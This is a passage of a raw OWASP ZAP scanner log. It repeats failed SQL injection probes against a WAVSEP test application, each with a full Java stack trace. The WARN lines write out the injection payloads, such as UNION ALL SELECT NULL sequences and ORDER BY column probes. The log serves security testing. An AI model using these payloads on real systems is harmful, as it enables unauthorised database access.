org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681926 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681928 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681928 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681929 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 2645#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 2645# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681929 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681931 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681931 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681932 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681933 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681934 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681934 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681936 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681936 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at 